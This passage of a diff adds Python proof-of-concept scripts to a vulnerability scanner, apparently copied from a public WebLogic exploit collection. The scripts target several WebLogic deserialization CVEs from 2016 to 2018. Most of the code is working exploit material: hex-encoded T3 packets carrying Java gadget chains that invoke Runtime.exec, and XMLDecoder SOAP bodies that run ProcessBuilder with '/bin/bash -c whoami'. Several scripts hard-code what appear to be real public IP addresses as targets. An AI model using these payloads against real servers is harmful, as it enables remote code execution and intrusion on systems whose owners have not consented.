    payload = '056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000'
    payload += data
    payload += 'fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff'
    payload = '%s%s' % ('{:08x}'.format(math.trunc(len(payload) / 2 + 4)), payload)
    sock.send(bytes.fromhex(payload))
    res = b''
    # try:
    #     while True:
    #         res += sock.recv(4096)
    #         time.sleep(0.1)
    # except:
    #     pass
    # return res
    while True:
        try:
            res += sock.recv(4096)
            time.sleep(0.1)
            return res
        except:
            break
 def checkVul(res, server_addr):
    p = re.findall(VER_SIG[0], str(res), re.S)
    # print(p)
    if len(p) > 0:
        # print '%s:%d is vul %s'%(server_addr[0],server_addr[1],VUL[index])
        result = '目标Weblogic存在JAVA反序列化漏洞,CVE-2016-0638 : http://%s' % server_addr
        # print(result)
        return result
    # else:
    #     return 'CVE-2016-0638'
 def poc(ip):
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        ##打了补丁之后，会阻塞，所以设置超时时间，默认15s，根据情况自己调整
        # socket.setdefaulttimeout(10)
        sock.settimeout(15)
        if '://' in str(ip):
            ip = ip.split('//')[1]
        rip = ip.split(':')[0]
        rport = int(ip.split(':')[1])
        server_addr = (str(rip), rport)
        try:
            t3handshake(sock, server_addr)
            buildT3RequestObject(sock, rport)
            for index in PAYLOAD:
                rs = sendEvilObjData(sock, index)
                return checkVul(rs, ip)
        except:
            pass
    except:
        pass
 if __name__ == "__main__":
    a = poc('http://167.86.78.228:7001')
    print(a)
--- a/saucerframe/scripts/weblogic_2016-3510.py
+++ b/saucerframe/scripts/weblogic_2016-3510.py
@@ -0,0 +1,107 @@
 # https://github.com/rabbitmask/WeblogicR
 # !/usr/bin/env python
 # _*_ coding:utf-8 _*_
 import socket
 import time
 import re
 import math, requests
 VUL = ['CVE-2016-3510']
 PAYLOAD = [
    'aced0005737200257765626c6f6769632e6a6d732e636f6d6d6f6e2e53747265616d4d657373616765496d706c6b88de4d93cbd45d0c00007872001f7765626c6f6769632e6a6d732e636f6d6d6f6e2e4d657373616765496d706c69126161d04df1420c000078707a000003f728200000000000000100000578aced00057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e747400124c6a6176612f6c616e672f4f626a6563743b7870737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b0200007870000000014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707371007e00007372002a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97040200015b000d695472616e73666f726d65727374002d5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707572002d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472616e73666f726d65723bbd562af1d83418990200007870000000057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e747400124c6a6176612f6c616e672f4f626a6563743b7870767200116a6176612e6c616e672e52756e74696d65000000000000000000000078707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000274000a67657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a990200007870000000007400096765744d6574686f647571007e001e00000002767200106a61767a0000018e612e6c616e672e537472696e67a0f0a4387a3bb34202000078707671007e001e7371007e00167571007e001b00000002707571007e001b00000000740006696e766f6b657571007e001e00000002767200106a6176612e6c616e672e4f626a656374000000000000000000000078707671007e001b7371007e0016757200135b4c6a6176612e6c616e672e537472696e673badd256e7e91d7b4702000078700000000174000863616c632e657865740004657865637571007e001e0000000171007e00237371007e0011737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b020000787000000001737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f40000000000010770800000010000000007878767200126a6176612e6c616e672e4f766572726964650000000000000000000000787071007e003a78',
    # 'aced0005737200257765626c6f6769632e636f7262612e7574696c732e4d61727368616c6c65644f626a656374592161d5f3d1dbb6020002490004686173685b00086f626a42797465737400025b427870b6f794cf757200025b42acf317f8060854e0020000787000000130aced00057372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000074000a67657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a99020000787000000001767200106a6176612e6c616e672e53797374656d00000000000000000000007870',
    # 'aced0005737d00000001001a6a6176612e726d692e72656769737472792e5265676973747279787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e766f636174696f6e48616e646c657200000000000000020200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e03000078707732000a556e696361737452656600093132372e302e302e3100000000000000006ed6d97b00000000000000000000000000000078'
 ]
 VER_SIG = ['org.apache.commons.collections.functors.InvokerTransformer']
 heads = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0',
 }
 def t3handshake(sock, server_addr):
    sock.connect(server_addr)
    sock.send(bytes.fromhex('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'))
    time.sleep(1)
    sock.recv(1024)
    # print 'handshake successful'
 def buildT3RequestObject(sock, rport):
    data1 = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371'
    data2 = '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd6000000070000{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format(
        '{:04x}'.format(rport))
    data3 = '1a7727000d3234322e323134'
    data4 = '2e312e32353461863d1d0000000078'
    for d in [data1, data2, data3, data4]:
        sock.send(bytes.fromhex(d))
    time.sleep(2)
    # print 'send request payload successful,recv length:%d'%(len(sock.recv(2048)))
 def sendEvilObjData(sock, data):
    payload = '056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000'
    payload += data
    payload += 'fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff'
    payload = '%s%s' % ('{:08x}'.format(math.trunc(len(payload) / 2 + 4)), payload)
    sock.send(bytes.fromhex(payload))
    res = b''
    # try:
    #     while True:
    #         res += sock.recv(4096)
    #         time.sleep(0.1)
    # except:
    #     pass
    # return res
    while True:
        try:
            res += sock.recv(4096)
            time.sleep(0.1)
            return res
        except:
            break
 def checkVul(res, server_addr):
    p = re.findall(VER_SIG[0], str(res), re.S)
    # print(p)
    if len(p) > 0:
        # print '%s:%d is vul %s'%(server_addr[0],server_addr[1],VUL[index])
        result = '目标Weblogic存在JAVA反序列化漏洞,CVE-2016-3510 : http://%s' % server_addr
        # print(result)
        return result
    # else:
    #     return 'CVE-2017-3506'
 def poc(ip):
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        ##打了补丁之后，会阻塞，所以设置超时时间，默认15s，根据情况自己调整
        # socket.setdefaulttimeout(10)
        sock.settimeout(15)
        if '://' in str(ip):
            ip = ip.split('//')[1]
        rip = ip.split(':')[0]
        rport = int(ip.split(':')[1])
        server_addr = (str(rip), rport)
        try:
            t3handshake(sock, server_addr)
            buildT3RequestObject(sock, rport)
            for index in PAYLOAD:
                rs = sendEvilObjData(sock, index)
                return checkVul(rs, ip)
        except:
            pass
    except:
        pass
 if __name__ == "__main__":
    # dip = sys.argv[1]
    # dport = int(sys.argv[2])
    # run(dip,dport,0)
    a = poc('')
    print(a)
--- a/saucerframe/scripts/weblogic_2017-10271.py
+++ b/saucerframe/scripts/weblogic_2017-10271.py
@@ -0,0 +1,76 @@
 # https://github.com/rabbitmask/WeblogicR
 # !/usr/bin/env python
 # _*_ coding:utf-8 _*_
 import requests
 import re
 heads = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
    'Content-Type': 'text/xml;charset=UTF-8'
 }
 # paths = [
 #     '/wls-wsat/CoordinatorPortType',
 #     '/wls-wsat/RegistrationPortTypeRPC',
 #     '/wls-wsat/ParticipantPortType',
 #     '/wls-wsat/RegistrationRequesterPortType',
 #     '/wls-wsat/CoordinatorPortType11',
 #     '/wls-wsat/RegistrationPortTypeRPC11',
 #     '/wls-wsat/ParticipantPortType11',
 #     '/wls-wsat/RegistrationRequesterPortType11'
 #
 # ]
 def check(url):
    if '://' not in str(url):
        url = "http://" + url
    if "/" in url:
        url += '/wls-wsat/CoordinatorPortType'
    post_str = '''
    <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
            <soapenv:Header>
                <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
                    <java>
                    <void class="java.lang.ProcessBuilder">
                    <array class="java.lang.String" length="2">
                    <void index="0">
                    <string>just4check</string>
                    </void>
                    </array>
                    <void method="start"/>
                    </void>
                    </java>
                </work:WorkContext>
            </soapenv:Header>
            <soapenv:Body/>
        </soapenv:Envelope>
    '''
    try:
        response = requests.post(url, data=post_str, verify=False, timeout=10, headers=heads)
        response = response.text
        response = re.search(u"<faultstring>.*</faultstring>", response).group(0)
    except:
        response = ""
    if '<faultstring>java.lang.ProcessBuilder' in response or "<faultstring>0" in response:
        result = '目标Weblogic存在XMLDecoder反序列化,CVE-2017-10271 : %s' % url
        return result
    # else:
    #     return 'CVE-2017-3506'
 def poc(ip):
    try:
        result = check(ip)
        return result
    except:
        pass
 if __name__ == '__main__':
    a = poc('58.40.21.161:80')
    print(a)
--- a/saucerframe/scripts/weblogic_2017-3248.py
+++ b/saucerframe/scripts/weblogic_2017-3248.py
@@ -0,0 +1,107 @@
 # https://github.com/rabbitmask/WeblogicR
 # !/usr/bin/env python
 # _*_ coding:utf-8 _*_
 import socket
 import time
 import re
 import math,requests
 VUL = ['CVE-2017-3248']
 PAYLOAD = [
    'aced0005737200257765626c6f6769632e6a6d732e636f6d6d6f6e2e53747265616d4d657373616765496d706c6b88de4d93cbd45d0c00007872001f7765626c6f6769632e6a6d732e636f6d6d6f6e2e4d657373616765496d706c69126161d04df1420c000078707a000003f728200000000000000100000578aced00057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e747400124c6a6176612f6c616e672f4f626a6563743b7870737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b0200007870000000014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707371007e00007372002a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97040200015b000d695472616e73666f726d65727374002d5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707572002d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472616e73666f726d65723bbd562af1d83418990200007870000000057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e747400124c6a6176612f6c616e672f4f626a6563743b7870767200116a6176612e6c616e672e52756e74696d65000000000000000000000078707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000274000a67657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a990200007870000000007400096765744d6574686f647571007e001e00000002767200106a61767a0000018e612e6c616e672e537472696e67a0f0a4387a3bb34202000078707671007e001e7371007e00167571007e001b00000002707571007e001b00000000740006696e766f6b657571007e001e00000002767200106a6176612e6c616e672e4f626a656374000000000000000000000078707671007e001b7371007e0016757200135b4c6a6176612e6c616e672e537472696e673badd256e7e91d7b4702000078700000000174000863616c632e657865740004657865637571007e001e0000000171007e00237371007e0011737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b020000787000000001737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f40000000000010770800000010000000007878767200126a6176612e6c616e672e4f766572726964650000000000000000000000787071007e003a78',
    # 'aced0005737200257765626c6f6769632e636f7262612e7574696c732e4d61727368616c6c65644f626a656374592161d5f3d1dbb6020002490004686173685b00086f626a42797465737400025b427870b6f794cf757200025b42acf317f8060854e0020000787000000130aced00057372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000074000a67657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a99020000787000000001767200106a6176612e6c616e672e53797374656d00000000000000000000007870',
    # 'aced0005737d00000001001a6a6176612e726d692e72656769737472792e5265676973747279787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e766f636174696f6e48616e646c657200000000000000020200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e03000078707732000a556e696361737452656600093132372e302e302e3100000000000000006ed6d97b00000000000000000000000000000078'
 ]
 VER_SIG = ['\\$Proxy[0-9]+']
 heads = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0',
 }
 def t3handshake(sock, server_addr):
    sock.connect(server_addr)
    sock.send(bytes.fromhex('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'))
    time.sleep(1)
    sock.recv(1024)
    # print 'handshake successful'
 def buildT3RequestObject(sock, rport):
    data1 = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371'
    data2 = '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd6000000070000{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format(
        '{:04x}'.format(rport))
    data3 = '1a7727000d3234322e323134'
    data4 = '2e312e32353461863d1d0000000078'
    for d in [data1, data2, data3, data4]:
        sock.send(bytes.fromhex(d))
    time.sleep(2)
    # print 'send request payload successful,recv length:%d'%(len(sock.recv(2048)))
 def sendEvilObjData(sock, data):
    payload = '056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000'
    payload += data
    payload += 'fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff'
    payload = '%s%s' % ('{:08x}'.format(math.trunc(len(payload) / 2 + 4)), payload)
    sock.send(bytes.fromhex(payload))
    res = b''
    # try:
    #     while True:
    #         res += sock.recv(4096)
    #         time.sleep(0.1)
    # except:
    #     pass
    # return res
    while True:
        try:
            res += sock.recv(4096)
            time.sleep(0.1)
            return res
        except:
            break
 def checkVul(res, server_addr):
    p = re.findall(VER_SIG[0], str(res), re.S)
    # print(p)
    if len(p) > 0:
        # print '%s:%d is vul %s'%(server_addr[0],server_addr[1],VUL[index])
        result = '目标Weblogic存在JAVA反序列化漏洞,CVE-2017-3248 : http://%s' % server_addr
        # print(result)
        return result
    # else:
    #     return 'CVE-2017-3248'
 def poc(ip):
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        ##打了补丁之后，会阻塞，所以设置超时时间，默认15s，根据情况自己调整
        # socket.setdefaulttimeout(10)
        sock.settimeout(15)
        if '://' in str(ip):
            ip = ip.split('//')[1]
        rip = ip.split(':')[0]
        rport = int(ip.split(':')[1])
        server_addr = (str(rip), rport)
        try:
            t3handshake(sock, server_addr)
            buildT3RequestObject(sock, rport)
            for index in PAYLOAD:
                rs = sendEvilObjData(sock, index)
                return checkVul(rs, ip)
        except:
            pass
    except:
        pass
 if __name__ == "__main__":
    # dip = sys.argv[1]
    # dport = int(sys.argv[2])
    # run(dip,dport,0)
    a = poc('')
    print(a)
--- a/saucerframe/scripts/weblogic_2017-3506.py
+++ b/saucerframe/scripts/weblogic_2017-3506.py
@@ -0,0 +1,69 @@
 # https://github.com/rabbitmask/WeblogicR
 # !/usr/bin/env python
 # _*_ coding:utf-8 _*_
 import requests
 import re
 heads = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
    'Content-Type': 'text/xml;charset=UTF-8'
 }
 def check(url):
    if '://' not in str(url):
        url = "http://" + url
    if "/" in url:
        url += '/wls-wsat/CoordinatorPortType'
    post_str = '''
    <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
      <soapenv:Header>
        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
          <java>
            <object class="java.lang.ProcessBuilder">
              <array class="java.lang.String" length="3">
                <void index="0">
                  <string>/bin/bash</string>
                </void>
                <void index="1">
                  <string>-c</string>
                </void>
 				<void index="2">
                  <string>whoami</string>
                </void>
              </array>
              <void method="start"/>
            </object>
          </java>
        </work:WorkContext>
      </soapenv:Header>
      <soapenv:Body/>
    </soapenv:Envelope>
    '''
    try:
        response = requests.post(url, data=post_str, verify=False, timeout=10, headers=heads)
        response = response.text
        response = re.search(u"<faultstring>.*</faultstring>", response).group(0)
    except:
        response = ""
    if '<faultstring>java.lang.ProcessBuilder' in response or "<faultstring>0" in response:
        result = '目标Weblogic存在XMLDecoder反序列化,CVE-2017-3506 : %s' % url
        return result
    # else:
    #     return 'CVE-2017-3506'
 def poc(ip):
    try:
        result = check(ip)
        return result
    except:
        pass
 if __name__ == '__main__':
    a = poc('181.198.62.181:7001')
    print(a)
--- a/saucerframe/scripts/weblogic_2018-2628.py
+++ b/saucerframe/scripts/weblogic_2018-2628.py
@@ -0,0 +1,102 @@
 # https://github.com/rabbitmask/WeblogicR
 # !/usr/bin/env python
 # _*_ coding:utf-8 _*_
 import socket
 import math
 import time
 import re,requests
 VUL = ['CVE-2018-2628']
 PAYLOAD = [
